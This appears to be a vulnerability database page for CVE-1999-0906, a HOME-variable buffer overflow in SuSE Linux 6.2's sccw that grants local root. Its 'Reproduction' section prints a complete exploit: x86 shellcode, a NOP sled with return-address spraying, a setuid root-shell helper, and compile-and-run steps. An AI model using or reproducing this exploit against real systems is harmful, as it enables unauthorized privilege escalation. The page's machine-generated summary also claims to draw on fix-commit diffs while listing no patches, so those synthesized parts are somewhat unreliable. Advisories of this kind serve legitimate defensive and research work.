CVE-1999-0906
Description
A buffer overflow in sccw, triggered by the HOME environment variable, allows local users to gain root privileges on SuSE Linux 6.2.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A buffer overflow in sccw, triggered by the HOME environment variable, allows local users to gain root privileges on SuSE Linux 6.2.
Vulnerability
A buffer overflow vulnerability exists in the sccw executable on SuSE Linux 6.2. This vulnerability is triggered by the HOME environment variable, allowing local users to exploit the overflow.
Exploitation
An attacker needs local access to the system. The exploit involves setting the HOME environment variable to a specially crafted string that overflows a buffer within sccw. This overflow can be used to overwrite control flow data, leading to the execution of arbitrary code. The provided exploit code [1] compiles and runs a program that sets the HOME environment variable and then executes sccw.
Impact
Successful exploitation of this vulnerability allows a local user to gain root privileges on the affected system. This means the attacker can perform any action on the system with the highest level of authority.
Mitigation
This vulnerability affects SuSE Linux 6.2. No specific patch information or fixed version is readily available in the provided references. Users are advised to upgrade to a non-vulnerable version or apply vendor-specific patches if available. As of the available references, there is no mention of this vulnerability being listed on the KEV catalog.
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The sccw program is vulnerable to a buffer overflow when handling the HOME environment variable."
Attack vector
Local users can exploit this vulnerability by setting the HOME environment variable to a specially crafted string. This string overflows a buffer within sccw, allowing an attacker to overwrite critical memory and gain root privileges. The exploit involves creating a malicious C program that sets the HOME environment variable and then executes sccw [ref_id=1].
Affected code
The vulnerability lies within the sccw program, specifically in its handling of the HOME environment variable. The provided exploit code demonstrates how to trigger this overflow by manipulating the HOME variable before executing sccw [ref_id=1].
What the fix does
The advisory does not provide information about a specific patch or fix. It indicates that local users can gain root privileges by exploiting the buffer overflow vulnerability in sccw's handling of the HOME environment variable [ref_id=1]. Users are advised to consult vendor advisories for remediation guidance.
Preconditions
- authThe attacker must have local access to the affected system.
- inputThe attacker must be able to control the HOME environment variable.
Reproduction
/tmp/sccwx.c /* * sccw local root Linux x86 tested on SuSE 6.2 * gcc -o sccwx sccwx.c * must compile/run a setuid(geteuid()); system("/bin/bash"); for a rootshell * * -Brock Tellier btellier@webley.com */
#include <stdlib.h> #include <stdio.h>
char exec[]= /* Generic Linux x86 running our /tmp program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sc";
#define LEN 400 #define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char *argv[]) {
int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN];
if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]);
} else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]);
} else { offset=2100; buflen=300;
}
addr=get_sp();
fprintf(stderr, "SuSE 6.2 sccw local root\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
memset(buf,NOP,buflen); memcpy(buf+(buflen/2),exec,strlen(exec)); for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4) *(int *)&buf[i]=addr+offset;
setenv("HOME", buf, 1); execl("/usr/bin/sccw", "sccw", NULL);
} /tmp/sccwuid.c void main() { setuid(geteuid()); system("/bin/bash"); }
Compile /tmp/sccwx... gcc -o /tmp/sccwx /tmp/sccwx.c Compile /tmp/sc... gcc -o /tmp/sc /tmp/sccwuid.c Launch /tmp/sccwx... /tmp/sccwx If it didn't work, try /tmp/sccwx <offset> <bufsiz> [ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.